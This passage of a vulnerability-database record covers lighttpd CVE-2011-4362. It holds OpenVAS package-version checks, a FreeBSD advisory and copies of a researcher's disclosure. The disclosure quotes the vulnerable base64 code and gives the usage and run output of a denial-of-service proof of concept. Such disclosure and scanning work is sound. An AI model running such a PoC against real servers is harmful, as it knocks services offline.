isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070687", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070687", "type": "openvas", "title": "Debian Security Advisory DSA 2368-1 (lighttpd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2368_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2368-1 (lighttpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70687\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2011-3389\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:14:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2368-1 (lighttpd)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202368-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\nXi Wang discovered that the base64 decoding routine which is used to\ndecode user input during an HTTP authentication, suffers of a signedness\nissue when processing user input. 
As a result it is possible to force\nlighttpd to perform an out-of-bounds read which results in Denial of\nService conditions.\n\nCVE-2011-3389\n\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\ncertain client, a so called BEAST attack allows man-in-the-middle\nattackers to obtain plaintext HTTP traffic via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session. Technically this is\nno lighttpd vulnerability. However, lighttpd offers a workaround to\nmitigate this problem by providing a possibility to disable CBC ciphers.\n\nThis updates includes this option by default. System administrators\nare advised to read the NEWS file of this update (as this may break older\nclients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your lighttpd packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report 
+= res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "description": "Gentoo Linux Local Security Checks GLSA 201406-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121213", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201406-10", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201406-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121213\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:20 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201406-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in lighttpd. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201406-10\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201406-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-servers/lighttpd\", unaffected: make_list(\"ge 1.4.35\"), vulnerable: make_list(\"lt 1.4.35\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T09:30:05", "description": "lighttpd Denial of Service Vulnerability PoC. CVE-2011-4362. Dos exploit for linux platform", "published": "2011-12-31T00:00:00", "type": "exploitdb", "title": "lighttpd Denial of Service Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-31T00:00:00", "id": "EDB-ID:18295", "href": "https://www.exploit-db.com/exploits/18295/", "sourceData": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. 
Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n\"src/http_auth.c:67\"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. 
| 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. 
| 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... 
OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd\t]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18295/"}], "freebsd": [{"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "\nUS-CERT/NIST reports:\n\nInteger signedness error in the base64_decode function in the\n\t HTTP authentication functionality (http_auth.c) in lighttpd 1.4\n\t before 1.4.30 and 1.5 before SVN revision 2806 allows remote\n\t attackers to cause a denial of service (segmentation fault)\n\t via crafted base64 input that triggers an out-of-bounds read\n\t with a negative index.\n\n", "edition": 4, "modified": "2011-11-29T00:00:00", "published": "2011-11-29T00:00:00", "id": "C6521B04-314B-11E1-9CF4-5404A67EEF98", "href": "https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html", "title": "lighttpd -- remote DoS in HTTP authentication", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:59", "description": "\nlighttpd - Denial of Service (PoC)", "edition": 1, "published": "2011-12-31T00:00:00", "title": "lighttpd - Denial of Service 
(PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-31T00:00:00", "id": "EXPLOITPACK:184DA427E35F6E3E6D5AC9CCCC72148E", "href": "", "sourceData": "29 of November 2011 was the date of public disclosure interesting\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\nfor this server does not propely decode characters from the extended\nASCII table. The vulnerable code is below:\n\n\n\"src/http_auth.c:67\"\n--- CUT ---\nstatic const short base64_reverse_table[256] = ...;\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\n\t...\n\tint ch, ...;\n\tsize_t i;\n\t...\n\n\t\tch = in[i];\n\t\t...\n\t\tch = base64_reverse_table[ch];\n\t...\n}\n--- CUT ---\n\nBecause variable 'in' is type 'char', characters above 0x80 lead to\nnegative indices.\nThis vulnerability may lead out-of-boud read and theoretically cause\nSegmentation Fault (Denial of Service attack).\nUnfortunately I couldn't find any binaries where .rodata section before\nthe base64_reverse_table\ntable cause this situation.\n\nI have added some extra debug in the lighttpd source code to see if this\nvulnerability is\nexecuted correctly. Here is output for one of the example:\n\n--- CUT ---\nptr[0x9a92c48] size[0xc0] used[0x0]\n127(. | 0 | 0)\n-128(t | 1 | 0)\n-127(e | 2 | 1)\n-126(' | 3 | 2)\n-125(e | 4 | 3)\n-124(u | 5 | 3)\n-123(r | 6 | 4)\n-122(' | 7 | 5)\n-121(s | 8 | 6)\n-120(c | 9 | 6)\n-119(i | 10 | 7)\n-118(n | 11 | 8)\n-117(i | 12 | 9)\n-116( | 13 | 9)\n-115(a | 14 | 10)\n-114(t | 15 | 11)\n-113(. | 16 | 12)\n-112(e | 17 | 12)\n-111(u | 18 | 13)\n-110(r | 19 | 14)\n-109(' | 20 | 15)\n-108(f | 21 | 15)\n-107(i | 22 | 16)\n-106(e | 23 | 17)\n-105(: | 24 | 18)\n-104(= | 25 | 18)\n-103(o | 26 | 19)\n-102(t | 27 | 20)\n-101(o | 28 | 21)\n-100( | 29 | 21)\n-99(a | 30 | 22)\n-98(g | 31 | 23)\n-97(. 
| 32 | 24)\n-96(d | 33 | 24)\n-95(g | 34 | 25)\n-94(s | 35 | 26)\n-93(: | 36 | 27)\n-92(u | 37 | 27)\n-91(s | 38 | 28)\n-90(p | 39 | 29)\n-89(o | 40 | 30)\n-88(t | 41 | 30)\n-87(d | 42 | 31)\n-86(b | 43 | 32)\n-85(c | 44 | 33)\n-84(e | 45 | 33)\n-83(d | 46 | 34)\n-82(( | 47 | 35)\n-81(n | 48 | 36)\n-80(y | 49 | 36)\n-79(h | 50 | 37)\n-78(d | 51 | 38)\n-77(g | 52 | 39)\n-76(s | 53 | 39)\n-75( | 54 | 40)\n-74(r | 55 | 41)\n-73(p | 56 | 42)\n-72(a | 57 | 42)\n-71(n | 58 | 43)\n-70(. | 59 | 44)\n-69(. | 60 | 45)\n-68(d | 61 | 45)\n-67(g | 62 | 46)\n-66(s | 63 | 47)\n-65(: | 64 | 48)\n-64(( | 65 | 48)\n-63(d | 66 | 49)\n-62(- | 67 | 50)\n-61(e | 68 | 51)\n-60(s | 69 | 51)\n-59( | 70 | 52)\n-58(i | 71 | 53)\n-57(s | 72 | 54)\n-56(n | 73 | 54)\n-55( | 74 | 55)\n-54(i | 75 | 56)\n-53(l | 76 | 57)\n-52(. | 77 | 57)\n-51(. | 78 | 58)\n-50(k | 79 | 59)\n-49(0 | 80 | 60)\n-48(% | 81 | 60)\n-47(] | 82 | 61)\n-46(p | 83 | 62)\n-45(r | 84 | 63)\n-44(0 | 85 | 63)\n-43(% | 86 | 64)\n-42(] | 87 | 65)\n-41(s | 88 | 66)\n-40(z | 89 | 66)\n-39([ | 90 | 67)\n-38(x | 91 | 68)\n-37(x | 92 | 69)\n-36( | 93 | 69)\n-35(s | 94 | 70)\n-34(d | 95 | 71)\n-33(0 | 96 | 72)\n-32(% | 97 | 72)\n-31(] | 98 | 73)\n-30(. | 99 | 74)\n-29(. | 100 | 75)\n-28(d | 101 | 75)\n-27(c | 102 | 76)\n-26(d | 103 | 77)\n-25(i | 104 | 78)\n-24(g | 105 | 78)\n-23(b | 106 | 79)\n-22(s | 107 | 80)\n-21(6 | 108 | 81)\n-20(- | 109 | 81)\n-19(t | 110 | 82)\n-18(i | 111 | 83)\n-17(g | 112 | 84)\n-16(f | 113 | 84)\n-15(i | 114 | 85)\n-14(e | 115 | 86)\n-13(. | 116 | 87)\n-12(. | 117 | 87)\n-11(. | 118 | 88)\n-10(. | 119 | 89)\n-9(. | 120 | 90)\n-8(. | 121 | 90)\n-7(. | 122 | 91)\n-6(. | 123 | 92)\n-5(. | 124 | 93)\n-4(. | 125 | 93)\n-3(. | 126 | 94)\n-2(. | 127 | 95)\n-1(. 
| 128 | 96)\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\nptr[0x9a92c48] size[0xc0] used[0x60]\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\n--- CUT ---\n\nFirst column is the offset so vulnerability is executed like it should be\n(negative offsets). Second column is byte which is read out-of-bound.\n\nHow to run this very primitive Proof of Concept?\n\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\n$ ./p_cve-2011-4362 \n\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\n]=- :::...\n\n\tUsage: ./p_cve-2011-4362 <options>\n\n\t\tOptions:\n\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\n\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\n]=- :::...\n\n\t\t[+] Preparing arguments... OK\n\t\t[+] Creating socket... OK\n\t\t[+] Connecting to [127.0.0.1]... OK\n\t\t[+] Sending dirty packet... OK\n\n\t\t[+] Check the website!\n\n$ \n\nLighttpd will log this situation probably in error-log file like this:\n\n--- CUT ---\n..\n..\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd\t]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\n\n--- CUT ---\n\nMaybe you can find vulnerable binary?\n\nBest regards,\nAdam 'pi3' Zabrocki\n\n\n--\nhttp://pi3.com.pl\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18295.c (p_cve-2011-4362.c)\nhttp://blog.pi3.com.pl/?p=277", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-01-03T13:04:46", "description": "Exploit for linux platform in category dos / poc", "edition": 2, "published": "2011-12-31T00:00:00", "type": "zdt", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "bulletinFamily": 
"exploit", "cvelist": [], "modified": "2011-12-31T00:00:00", "id": "1337DAY-ID-17319", "href": "https://0day.today/exploit/description/17319", "sourceData": "/*\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * \t...\r\n * \tint ch, ...;\r\n * \tsize_t i;\r\n * \t...\r\n * \t\r\n * \t\tch = in[i];\r\n * 